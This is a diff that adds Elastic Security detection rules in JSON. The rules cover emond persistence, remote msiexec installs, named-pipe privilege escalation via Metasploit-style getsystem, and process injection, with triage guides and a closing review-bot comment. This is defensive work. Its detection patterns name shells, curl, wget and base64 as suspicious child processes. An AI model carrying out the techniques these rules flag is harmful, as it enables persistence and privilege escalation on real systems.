"name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + 
"version": 4 + }, + "id": "3e12a439-d002-4944-bc42-171c0dcb9b96_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_106.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_106.json new file mode 100644 index 00000000000..48586fba481 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_106.json 
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a suspicious child process of the Event Monitor Daemon (emond). Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Emond Child Process", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.parent.name : \"emond\" and\n process.name : (\n \"bash\",\n \"dash\",\n \"sh\",\n \"tcsh\",\n \"csh\",\n \"zsh\",\n \"ksh\",\n \"fish\",\n \"Python\",\n \"python*\",\n \"perl*\",\n \"php*\",\n \"osascript\",\n \"pwsh\",\n \"curl\",\n \"wget\",\n \"cp\",\n \"mv\",\n \"touch\",\n \"echo\",\n \"base64\",\n \"launchctl\")\n", + "references": [ + "https://www.xorrior.com/emond-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3e3d15c6-1509-479a-b125-21718372157e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.014", + "name": "Emond", + "reference": "https://attack.mitre.org/techniques/T1546/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "3e3d15c6-1509-479a-b125-21718372157e_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_2.json b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_2.json new file mode 100644 index 00000000000..d4b66f712cb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_2.json 
@@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote File Execution via MSIEXEC", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n process.name : \"msiexec.exe\" and process.args : \"/V\"] by process.entity_id\n [network where host.os.type == \"windows\" and process.name : \"msiexec.exe\" and\n event.action == \"connection_attempted\"] by process.entity_id\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n process.parent.name : \"msiexec.exe\" and user.id : (\"S-1-5-21-*\", \"S-1-5-12-1-*\") and\n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\srtasks.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\srtasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskkill.exe\",\n \"?:\\\\Windows\\\\Installer\\\\MSI*.tmp\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\ie4uinit.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\ie4uinit.exe\",\n \"?:\\\\Windows\\\\System32\\\\sc.exe\",\n \"?:\\\\Windows\\\\system32\\\\Wbem\\\\mofcomp.exe\",\n \"?:\\\\Windows\\\\twain_32\\\\fjscan32\\\\SOP\\\\crtdmprc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\taskkill.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\schtasks.exe\",\n \"?:\\\\Windows\\\\system32\\\\schtasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\sdbinst.exe\") and\n not (process.code_signature.subject_name == \"Citrix Systems, Inc.\" and process.code_signature.trusted == true) and\n not (process.name : (\"regsvr32.exe\", 
\"powershell.exe\", \"rundll32.exe\", \"wscript.exe\") and\n process.Ext.token.integrity_level_name == \"high\" and\n process.args : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\")) and\n not (process.executable : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and process.code_signature.trusted == true) and\n not (process.name : \"rundll32.exe\" and process.args : \"printui.dll,PrintUIEntry\")\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e441bdb-596c-44fd-8628-2cfdf4516ada", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": 
"T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.007", + "name": "Msiexec", + "reference": "https://attack.mitre.org/techniques/T1218/007/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "3e441bdb-596c-44fd-8628-2cfdf4516ada_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_109.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_109.json new file mode 100644 index 00000000000..8e24ee5f3cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_109.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via named pipe impersonation. An adversary may abuse this technique by utilizing a framework such Metasploit's meterpreter getsystem command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Named Pipe Impersonation", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"Cmd.Exe\", \"PowerShell.EXE\") or ?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\")) and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "references": [ + "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", + "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", + "https://redcanary.com/blog/getsystem-offsec/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor 
more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_110.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_110.json new file mode 100644 index 00000000000..84f053ec7ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_110.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via named pipe impersonation. An adversary may abuse this technique by utilizing a framework such Metasploit's meterpreter getsystem command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Named Pipe Impersonation", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"Cmd.Exe\", \"PowerShell.EXE\") or ?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\")) and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "references": [ + "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", + "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", + "https://redcanary.com/blog/getsystem-offsec/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor 
more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208.json new file mode 100644 index 00000000000..901de40cbb5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a process is created and immediately accessed from an unknown memory code region and by the same parent process. This may indicate a code injection attempt.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Creation CallTrace", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Creation CallTrace\n\nAttackers may inject code into child processes' memory to hide their actual activity, evade detection mechanisms, and decrease discoverability during forensics. This rule looks for a spawned process by Microsoft Office, scripting, and command line applications, followed by a process access event for an unknown memory region by the parent process, which can indicate a code injection attempt.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Create a memory dump of the child process for analysis.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"windows\" and event.code == \"1\" and\n /* sysmon process creation */\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\", \"fltldr.exe\",\n \"mspub.exe\", \"msaccess.exe\",\"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") and\n\n /* noisy FP patterns */\n not (process.parent.name : \"EXCEL.EXE\" and process.executable : \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\ADDINS\\\\*.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\splwow64.exe\" and process.args in (\"8192\", \"12288\") and process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"rundll32.exe\" and process.parent.args : (\"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\", 
\"--no-sandbox\")) and\n not (process.executable :\n (\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\DWWIN.EXE\") and\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"regsvr32.exe\" and process.parent.args : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ] by process.parent.entity_id, process.entity_id\n [process where host.os.type == \"windows\" and event.code == \"10\" and\n /* Sysmon process access event from unknown module */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"] by process.entity_id, winlog.event_data.TargetProcessGUID\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetProcessGUID", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3ed032b2-45d8-4406-bc79-7ad1eabb2c72", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation 
Guide", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "type": "eql", + "version": 208 + }, + "id": "3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_104.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_104.json new file mode 100644 index 00000000000..8c475b5aec5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_104.json 
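Review bot: The new rule has no `timestamp_override`, while several sibling rules in this change (3ecbdc9e_110, 3efee4f0, 3f3f9fe2_110, 3f4d7734_3) set `"timestamp_override": "event.ingested"`; with a `now-9m` lookback over a 1-minute `sequence`, Sysmon events that arrive late via winlogbeat are evaluated on `@timestamp` alone and can fall outside the search window. If the omission is deliberate (for example because the `winlogbeat-*` indices may not populate `event.ingested`), a short `setup` note saying so would help, in the same way the 3ecbdc9e rule above documents its `event.ingested` fallback caveat. Otherwise add `"timestamp_override": "event.ingested",` next to `"type": "eql"`.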
